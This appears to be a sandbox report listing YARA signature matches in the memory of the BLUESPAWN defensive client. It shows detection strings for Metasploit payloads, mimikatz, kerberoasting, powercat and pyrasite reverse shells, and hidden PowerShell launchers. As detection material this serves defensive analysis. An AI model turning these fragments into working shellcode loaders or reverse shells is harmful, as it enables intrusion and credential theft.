| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_jtesta_ssh_mitm | intercepts ssh connections to capture credentials | @fusionrace | - 0x32b4bd:$a1: INTERCEPTED PASSWORD:
- 0x377540:$a1: INTERCEPTED PASSWORD:
- 0x32b4df:$a2: more sshbuf problems.
- 0x377558:$a2: more sshbuf problems.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_masscan | masscan is a performant port scanner, it produces results similar to nmap | @mimeframe | - 0x32b60b:$a1: EHLO masscan
- 0x32b624:$a2: User-Agent: masscan/
- 0x37762e:$a2: User-Agent: masscan/
- 0x32b645:$a3: /etc/masscan/masscan.conf
- 0x32b66b:$b1: nmap(%s): unsupported. This code will never do DNS lookups.
- 0x377661:$b1: nmap(%s): unsupported. This code will never do DNS lookups.
- 0x32b6b3:$b2: nmap(%s): unsupported, we do timing WAY different than nmap
- 0x37769f:$b2: nmap(%s): unsupported, we do timing WAY different than nmap
- 0x32b6fb:$b3: [hint] I've got some local priv escalation 0days that might work
- 0x3776dd:$b3: [hint] I've got some local priv escalation 0days that might work
- 0x32b748:$b4: [hint] VMware on Macintosh doesn't support masscan
- 0x377720:$b4: [hint] VMware on Macintosh doesn't support masscan
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_ncc_ABPTTS | Allows for TCP tunneling over HTTP | @mimeframe | - 0x32b863:$s1: ---===[[[ A Black Path Toward The Sun ]]]===---
- 0x3777d6:$s1: ---===[[[ A Black Path Toward The Sun ]]]===---
- 0x32b89f:$s2: https://vulnerableserver/EStatus/
- 0x377808:$s2: https://vulnerableserver/EStatus/
- 0x32b8cd:$s3: Error: no ABPTTS forwarding URL was specified. This utility will now exit.
- 0x37782c:$s3: Error: no ABPTTS forwarding URL was specified. This utility will now exit.
- 0x32b924:$s4: tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq
- 0x32b955:$s5: 63688c4f211155c76f2948ba21ebaf83
- 0x32b982:$s6: ABPTTSClient-log.txt
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_ntlmrelayx | https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/ | @mimeframe | - 0x32bacb:$a1: Started interactive SMB client shell via TCP
- 0x3779a7:$a1: Started interactive SMB client shell via TCP
- 0x32bb04:$a2: Service Installed.. CONNECT!
- 0x3779d6:$a2: Service Installed.. CONNECT!
- 0x32bb2d:$a3: Done dumping SAM hashes for host:
- 0x3779f5:$a3: Done dumping SAM hashes for host:
- 0x32bb5b:$a4: DA already added. Refusing to add another
- 0x377a19:$a4: DA already added. Refusing to add another
- 0x32bb91:$a5: Domain info dumped into lootdir!
- 0x377a45:$a5: Domain info dumped into lootdir!
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_pyrasite_py | A tool for injecting arbitrary code into running Python processes. | @fusionrace | - 0x32bcbd:$s1: WARNING: ptrace is disabled. Injection will not work.
- 0x32bcff:$s2: A payload that connects to a given host:port and receives commands
- 0x32bd4e:$s3: A reverse Python connection payload.
- 0x32bd7f:$s4: pyrasite - inject code into a running python process
- 0x32bdc0:$s5: The ID of the process to inject code into
- 0x32bdf6:$s6: This file is part of pyrasite.
- 0x32bc62:$s7: https://github.com/lmacken/pyrasite
- 0x32be21:$s7: https://github.com/lmacken/pyrasite
- 0x32be51:$s8: Setup a communication socket with the process by injecting
- 0x32be98:$s9: a reverse subshell and having it connect back to us.
- 0x32bed9:$s10: Write out a reverse python connection payload with a custom port
- 0x32bf26:$s11: Wait for the injected payload to connect back to us
- 0x32bf66:$s12: PyrasiteIPC
- 0x32bf7e:$s13: A reverse Python shell that behaves like Python interactive interpreter.
- 0x32bfd3:$s14: pyrasite cannot establish reverse
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_responder_py | Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server | @fusionrace | - 0x32c161:$s1: Poison all requests with another IP address than Responder's one.
- 0x32c1af:$s2: Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
- 0x32c20b:$s3: Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network.
- 0x32c285:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x32c387:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x32c2e4:$s5: Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)
- 0x32c34b:$s6: 31mOSX detected, -i mandatory option is missing
- 0x32c285:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x32c387:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_hot_potato | https://foxglovesecurity.com/2016/01/16/hot-potato/ | @mimeframe | - 0x32c4d8:$a1: Parsing initial NTLM auth...
- 0x3781a4:$a1: Parsing initial NTLM auth...
- 0x32c501:$a2: Got PROPFIND for /test...
- 0x3781c3:$a2: Got PROPFIND for /test...
- 0x32c527:$a3: Starting NBNS spoofer...
- 0x3781df:$a3: Starting NBNS spoofer...
- 0x32c54c:$a4: Exhausting UDP source ports so DNS lookups will fail...
- 0x3781fa:$a4: Exhausting UDP source ports so DNS lookups will fail...
- 0x32c590:$a5: Usage: potato.exe -ip
- 0x378234:$a5: Usage: potato.exe -ip
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_moyix_creddump | creddump is a python tool to extract credentials and secrets from Windows registry hives. | @mimeframe | - 0x32c6ca:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
- 0x378309:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
- 0x32c705:$a2: 0123456789012345678901234567890123456789
- 0x37833a:$a2: 0123456789012345678901234567890123456789
- 0x32c73a:$a3: NTPASSWORD
- 0x378365:$a3: NTPASSWORD
- 0x32c751:$a4: LMPASSWORD
- 0x378372:$a4: LMPASSWORD
- 0x2d4363:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x32c768:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x339ec3:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x37837f:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x32c795:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
- 0x3783a2:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_ncc_wmicmd | Command shell wrapper for WMI | @mimeframe | - 0x32c89b:$a1: Need to specify a username, domain and password for non local connections
- 0x37844b:$a1: Need to specify a username, domain and password for non local connections
- 0x32c8f1:$a2: WS-Management is running on the remote host
- 0x378497:$a2: WS-Management is running on the remote host
- 0x32c929:$a3: firewall (if enabled) allows connections
- 0x3784c5:$a3: firewall (if enabled) allows connections
- 0x32c95e:$a4: WARNING: Didn't see stdout output finished marker - output may be truncated
- 0x3784f0:$a4: WARNING: Didn't see stdout output finished marker - output may be truncated
- 0x32c9b6:$a5: Command sleep in milliseconds - increase if getting truncated output
- 0x37853e:$a5: Command sleep in milliseconds - increase if getting truncated output
- 0x32ca07:$b1: 0x800706BA
- 0x378585:$b1: 0x800706BA
- 0x32ca1e:$b2: NTLMDOMAIN:
- 0x378592:$b2: NTLMDOMAIN:
- 0x32ca36:$b3: cimv2
- 0x3785a0:$b3: cimv2
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_rdp_cmd_delivery | Delivers a text payload via RDP (rubber ducky) | @fusionrace | - 0x32cb5a:$s1: Usage: rdp-cmd-delivery.sh OPTIONS
- 0x37865f:$s1: Usage: rdp-cmd-delivery.sh OPTIONS
- 0x32cb89:$s2: [--tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt
- 0x378684:$s2: [--tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt
- 0x32cbe7:$s3: -cmdfile local.bat #will execute everything from local.bat
- 0x3786d8:$s3: -cmdfile local.bat #will execute everything from local.bat
- 0x32cc3d:$s4: To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console
- 0x378724:$s4: To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_wmi_implant | A PowerShell based tool that is designed to act like a RAT | @fusionrace | - 0x32cdc3:$s1: This really isn't applicable unless you are using WMImplant interactively.
- 0x32ce1a:$s2: What command do you want to run on the remote system? >
- 0x32ce5e:$s3: Do you want to [create] or [delete] a string registry value? >
- 0x32cea9:$s4: Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >
- 0x32cf0d:$s5: What is the name of the service you are targeting? >
- 0x32cf4e:$s6: This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine
- 0x32cfd0:$s7: gen_cli - Generate the CLI command to execute a command via WMImplant
- 0x32d022:$s8: exit - Exit WMImplant
- 0x32d044:$s9: Lateral Movement Facilitation
- 0x32d06e:$s10: vacant_system - Determine if a user is away from the system.
- 0x32d0b7:$s11: Please provide the ProcessID or ProcessName flag to specify the process to kill!
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_mimikatz_errors | Mimikatz credential dump tool: Error messages | @fusionrace | - 0x32d70f:$s1: [ERROR] [LSA] Symbols
- 0x32d731:$s2: [ERROR] [CRYPTO] Acquire keys
- 0x32d75b:$s3: [ERROR] [CRYPTO] Symbols
- 0x32d780:$s4: [ERROR] [CRYPTO] Init
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_mimikatz_sekurlsa | Mimikatz credential dump tool | @fusionrace | - 0x32de5a:$s1: dpapisrv!g_MasterKeyCacheList
- 0x32de84:$s2: lsasrv!g_MasterKeyCacheList
- 0x32deac:$s3: !SspCredentialList
- 0x379470:$s3: !SspCredentialList
- 0x32decb:$s4: livessp!LiveGlobalLogonSessionList
- 0x32defa:$s5: wdigest!l_LogSessList
- 0x32df1c:$s6: tspkg!TSGlobalCredTable
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | - 0x2bee22:$s1: export buf=\
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0x2befc6:$s1: & "\" & "svchost.exe"
- 0x2befe8:$s2: CreateObject("Wscript.Shell")
- 0x2c019f:$s2: CreateObject("Wscript.Shell")
- 0x2c2b6c:$s2: CreateObject("Wscript.Shell")
- 0x2c3780:$s2: CreateObject("Wscript.Shell")
- 0x2caf64:$s2: CreateObject("Wscript.Shell")
- 0x32e1c2:$s2: CreateObject("Wscript.Shell")
- 0x2bf012:$s3: <% @language="VBScript" %>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0x2bf1ca:$s1: powershell.exe -nop -w hidden -e
- 0x2c0989:$s1: powershell.exe -nop -w hidden -e
- 0x2c2065:$s1: powershell.exe -nop -w hidden -e
- 0x2c30e4:$s1: powershell.exe -nop -w hidden -e
- 0x2caed9:$s1: powershell.exe -nop -w hidden -e
- 0x3337e5:$s1: powershell.exe -nop -w hidden -e
- 0x2bf1f7:$s2: Call Shell(
- 0x2bf20f:$s3: Sub Workbook_Open()
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0x2bf3c0:$s1: '* PAYLOAD DATA
- 0x2bf3dc:$s2: = Shell(
- 0x2c21b7:$s2: = Shell(
- 0x2bf3f2:$s3: = Environ("USERPROFILE")
- 0x2bf417:$s4: '**************************************************************
- 0x2bf463:$s5: ChDir (
- 0x2bf477:$s6: '* MACRO CODE
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0x2bf61c:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x2c232d:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x2bf672:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0x2bf6b7:$s3: .func]::VirtualAlloc(0,
- 0x2c23b4:$s3: .func]::VirtualAlloc(0,
- 0x2bf6db:$s4: .func+AllocationType]::Reserve -bOr [
- 0x2c23ce:$s4: .func+AllocationType]::Reserve -bOr [
- 0x2bf70d:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0x2bf74f:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0x2bf7a8:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0x2bf7f5:$s8: .func]::CreateThread(0,0,$
- 0x2bf81c:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0x2bf85a:$s10: = [System.Convert]::FromBase64String("/
- 0x2c2512:$s10: = [System.Convert]::FromBase64String("/
- 0x2bf88e:$s11: { $global:result = 3; return }
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0x2bfa45:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x2c2652:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x2bfa76:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x2c2679:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x2bfaaf:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0x2bfaf2:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0x2bfb39:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0x2bfd4d:$x1: = new System.Diagnostics.Process();
- 0x2bfd7d:$x2: .StartInfo.UseShellExecute = true;
- 0x2bfdac:$x3: , "svchost.exe");
- 0x2c28db:$x3: , "svchost.exe");
- 0x2bfdca:$s4: = Path.GetTempPath();
- 0x2c28ef:$s4: = Path.GetTempPath();
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0x2c019d:$s1: = CreateObject("Wscript.Shell")
- 0x2c377e:$s1: = CreateObject("Wscript.Shell")
- 0x2caf62:$s1: = CreateObject("Wscript.Shell")
- 0x2c01c9:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c3745:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c0202:$s3: .GetSpecialFolder(2)
- 0x2c2bbb:$s3: .GetSpecialFolder(2)
- 0x2c0223:$s4: .Write Chr(CLng("
- 0x2c2bd2:$s4: .Write Chr(CLng("
- 0x2c0241:$s5: = "4d5a90000300000004000000ffff00
- 0x2c2be6:$s5: = "4d5a90000300000004000000ffff00
- 0x2c026f:$s6: For i = 1 to Len(
- 0x2c2c0a:$s6: For i = 1 to Len(
- 0x2c028d:$s7: ) Step 2
- 0x2c2c1e:$s7: ) Step 2
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0x2c042d:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x2c2d1c:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x2c047d:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0x2c04b6:$s3: = RtlMoveMemory(
- 0x2c2d91:$s3: = RtlMoveMemory(
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0x2bf61c:$s1: [DllImport("kernel32.dll")]
- 0x2c065e:$s1: [DllImport("kernel32.dll")]
- 0x2c0686:$s2: [DllImport("msvcrt.dll")]
- 0x2c06ac:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0x2c06ea:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x2c2f05:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x2c0715:$s5: .Length,0x1000),0x3000,0x40)
- 0x2c2f26:$s5: .Length,0x1000),0x3000,0x40)
- 0x2c073e:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0x2c07ba:$s7: ::memset([IntPtr]($
- 0x2c2fb7:$s7: ::memset([IntPtr]($
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0x2c096b:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
- 0x2c30c6:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0x2c0afc:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0x2c0b52:$s2: .concat(".exe");
- 0x2c0b6f:$s3: [0] = "chmod";
- 0x2c322e:$s3: [0] = "chmod";
- 0x2c0b8a:$s4: = Runtime.getRuntime().exec(
- 0x2c323f:$s4: = Runtime.getRuntime().exec(
- 0x2db7dd:$s4: = Runtime.getRuntime().exec(
- 0x2e1384:$s4: = Runtime.getRuntime().exec(
- 0x2fd33f:$s4: = Runtime.getRuntime().exec(
- 0x320efb:$s4: = Runtime.getRuntime().exec(
- 0x33ee51:$s4: = Runtime.getRuntime().exec(
- 0x342c5f:$s4: = Runtime.getRuntime().exec(
- 0x356650:$s4: = Runtime.getRuntime().exec(
- 0x36ff60:$s4: = Runtime.getRuntime().exec(
- 0x2c0bb3:$s5: , 16) & 0xff;
- 0x2c325e:$s5: , 16) & 0xff;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0x2c36f1:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0x2c01c9:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c3745:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c377e:$s3: = CreateObject("Wscript.Shell")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0x2c393c:$s1: kernel32.dll WaitForSingleObject),
- 0x32e2dc:$s1: kernel32.dll WaitForSingleObject),
- 0x2c396b:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x32e301:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x2c39ea:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x32e376:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x2c3a58:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x32e3da:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x2bf85a:$s5: = [System.Convert]::FromBase64String(
- 0x2c2512:$s5: = [System.Convert]::FromBase64String(
- 0x2c3aa3:$s5: = [System.Convert]::FromBase64String(
- 0x32e41b:$s5: = [System.Convert]::FromBase64String(
- 0x2c3ad5:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0x2c3b17:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
- 0x32e47b:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0x2c3f4c:$xx2: metsrv.x64.dll
- 0x34a39:$xs1: WS2_32.dll
- 0x8cc6e:$xs1: WS2_32.dll
- 0xb6cec:$xs1: WS2_32.dll
- 0x10ef21:$xs1: WS2_32.dll
- 0x114010:$xs1: WS2_32.dll
- 0x2c3f67:$xs1: WS2_32.dll
- 0x394c76:$xs1: WS2_32.dll
- 0x2a26ee:$xs2: ReflectiveLoader
- 0x2b9c46:$xs2: ReflectiveLoader
- 0x2b9d4d:$xs2: ReflectiveLoader
- 0x2b9d8b:$xs2: ReflectiveLoader
- 0x2bafc5:$xs2: ReflectiveLoader
- 0x2bafed:$xs2: ReflectiveLoader
- 0x2bb046:$xs2: ReflectiveLoader
- 0x2bb07a:$xs2: ReflectiveLoader
- 0x2bb0a4:$xs2: ReflectiveLoader
- 0x2bb2c3:$xs2: ReflectiveLoader
- 0x2bb342:$xs2: ReflectiveLoader
- 0x2bb4a2:$xs2: ReflectiveLoader
- 0x2bb4ff:$xs2: ReflectiveLoader
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Base64_PS1_Shellcode | Detects Base64 encoded PS1 Shellcode | Nick Carr, David Ledbetter | - 0x2cf3df:$substring: AAAAYInlM
- 0x2cf40f:$substring: AAAAYInlM
- 0x2cf43f:$substring: AAAAYInlM
- 0x336abc:$substring: AAAAYInlM
- 0x336ad2:$substring: AAAAYInlM
- 0x336ae8:$substring: AAAAYInlM
- 0x2cf40b:$pattern1: /OiCAAAAYInlM
- 0x336ace:$pattern1: /OiCAAAAYInlM
- 0x2cf43b:$pattern2: /OiJAAAAYInlM
- 0x336ae4:$pattern2: /OiJAAAAYInlM
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x2c8fcb:$x1: /\/===\__
- 0x332268:$x1: /\/===\__
- 0x2c8fe1:$x2: ${__/\/==
- 0x332274:$x2: ${__/\/==
- 0x2c8ff7:$x3: Catch { }
- 0x2c900d:$x4: \_/=} ${_
- 0x33228c:$x4: \_/=} ${_
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_OBFUSC_PowerShell_True_Jun20_1 | Detects indicators often found in obfuscated PowerShell scripts | Florian Roth | - 0x2c93ae:$: ${t`rue}
- 0x3324d0:$: ${t`rue}
- 0x2c93c3:$: ${tr`ue}
- 0x3324d9:$: ${tr`ue}
- 0x2c93d8:$: ${tru`e}
- 0x3324e2:$: ${tru`e}
- 0x2c93ed:$: ${t`ru`e}
- 0x3324eb:$: ${t`ru`e}
- 0x2c9403:$: ${tr`u`e}
- 0x3324f5:$: ${tr`u`e}
- 0x2c9419:$: ${t`r`ue}
- 0x3324ff:$: ${t`r`ue}
- 0x2c942f:$: ${t`r`u`e}
- 0x332509:$: ${t`r`u`e}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Payload_Exe2Hex | Detects payload generated by exe2hex | Florian Roth | - 0x167479:$a1: set /p "=4d5a
- 0x1743a0:$a1: set /p "=4d5a
- 0x2d4652:$a1: set /p "=4d5a
- 0x33a088:$a1: set /p "=4d5a
- 0x167493:$a2: powershell -Command "$hex=
- 0x1743b0:$a2: powershell -Command "$hex=
- 0x2d466c:$a2: powershell -Command "$hex=
- 0x33a098:$a2: powershell -Command "$hex=
- 0x1674ba:$b1: set+%2Fp+%22%3D4d5
- 0x1743cd:$b1: set+%2Fp+%22%3D4d5
- 0x2d4693:$b1: set+%2Fp+%22%3D4d5
- 0x33a0b5:$b1: set+%2Fp+%22%3D4d5
- 0x1674d9:$b2: powershell+-Command+%22%24hex
- 0x1743e2:$b2: powershell+-Command+%22%24hex
- 0x2d46b2:$b2: powershell+-Command+%22%24hex
- 0x33a0ca:$b2: powershell+-Command+%22%24hex
- 0x167503:$c1: echo 4d 5a
- 0x174402:$c1: echo 4d 5a
- 0x2d46dc:$c1: echo 4d 5a
- 0x33a0ea:$c1: echo 4d 5a
- 0x16751b:$c2: echo r cx >>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0x2bb25d:$x1: \Release\reflective_dll.pdb
- 0x2bb45a:$x1: \Release\reflective_dll.pdb
- 0x2bb285:$x2: reflective_dll.x64.dll
- 0x2bb2a8:$s3: DLL Injection
- 0x2bb2c2:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0x2bb4fe:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0x2bba0f:$x1: \ReflectiveDLLInjection-master\
- 0x2bbe79:$x1: \ReflectiveDLLInjection-master\
- 0x2bba3b:$s2: reflective_dll.dll
- 0x2bc143:$s2: reflective_dll.dll
- 0x2bc194:$s2: reflective_dll.dll
- 0x154598:$s3: DLL injection
- 0x154853:$s3: DLL injection
- 0x2ab965:$s3: DLL injection
- 0x2bba5a:$s3: DLL injection
- 0x31fb22:$s3: DLL injection
- 0x36f1f0:$s3: DLL injection
- 0x2bb045:$s4: _ReflectiveLoader@4
- 0x2bba74:$s4: _ReflectiveLoader@4
- 0x2bbf2e:$s4: _ReflectiveLoader@4
- 0x2bba94:$s5: Reflective Dll Injection
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0x2bc0e0:$s1: \Release\inject.pdb
- 0x2bc100:$s2: !!! Failed to gather information on system processes!
- 0x2bba3b:$s3: reflective_dll.dll
- 0x2bc143:$s3: reflective_dll.dll
- 0x2bc194:$s3: reflective_dll.dll
- 0x2bc162:$s4: [-] %s. Error=%d
- 0x2bc17f:$s5: \Start Menu\Programs\reflective_dll.dll
- 0x2bcdcc:$s5: \Start Menu\Programs\reflective_dll.dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | GetUserSPNs_VBS | Auto-generated rule - file GetUserSPNs.vbs | Florian Roth | - 0x2b9568:$s1: Wscript.Echo "User Logon: " & oRecordset.Fields("samAccountName")
- 0x2b95b6:$s2: Wscript.Echo " USAGE: " & WScript.ScriptName & " SpnToFind [GC Servername or Forestname]"
- 0x2b9623:$s3: strADOQuery = "<" + strGCPath + ">;(&(!objectClass=computer)(servicePrincipalName=*));" & _
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | GetUserSPNs_PS1 | Auto-generated rule - file GetUserSPNs.ps1 | Florian Roth | - 0x2b9832:$s1: $ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
- 0x2b9892:$s2: @{Name="PasswordLastSet"; Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
- 0x2b990f:$s3: Write-Host "No Global Catalogs Found!"
- 0x2b9942:$s4: $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | kerberoast_PY | Auto-generated rule - file kerberoast.py | Florian Roth | - 0x2b9b29:$s1: newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
- 0x2b9b8b:$s2: key = kerberos.ntlmhash(args.password)
- 0x2b9bbe:$s3: help='the password used to decrypt/encrypt the ticket')
- 0x2b9c02:$s4: newencserverticket = kerberos.encrypt(key, 2, e, nonce)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedPowerCat | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs | Florian Roth | - 0x2c4e6c:$x1: Now if we point Firefox to http://127.0.0.1
- 0x2c4ea4:$x2: powercat -l -v -p
- 0x2c4ec2:$x3: P0wnedListener
- 0x2c5419:$x3: P0wnedListener
- 0x2c4edd:$x4: EncodedPayload.bat
- 0x2c4efc:$x5: powercat -c
- 0x2c4f15:$x6: Program.P0wnedPath()
- 0x2c6375:$x6: Program.P0wnedPath()
- 0x32f29c:$x6: Program.P0wnedPath()
- 0x33015a:$x6: Program.P0wnedPath()
- 0x2c4f36:$x7: Invoke-PowerShellTcpOneLine
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x2c512b:$x1: Invoke-TokenManipulation
- 0x2c5920:$x1: Invoke-TokenManipulation
- 0x2c5150:$x2: windows/meterpreter
- 0x2c59e4:$x2: windows/meterpreter
- 0x2c7b58:$x2: windows/meterpreter
- 0x32fa2f:$x2: windows/meterpreter
- 0x331304:$x2: windows/meterpreter
- 0x2c5170:$x3: lsadump::dcsync
- 0x2c518c:$x4: p0wnedShellx86
- 0x2c51a7:$x5: p0wnedShellx64
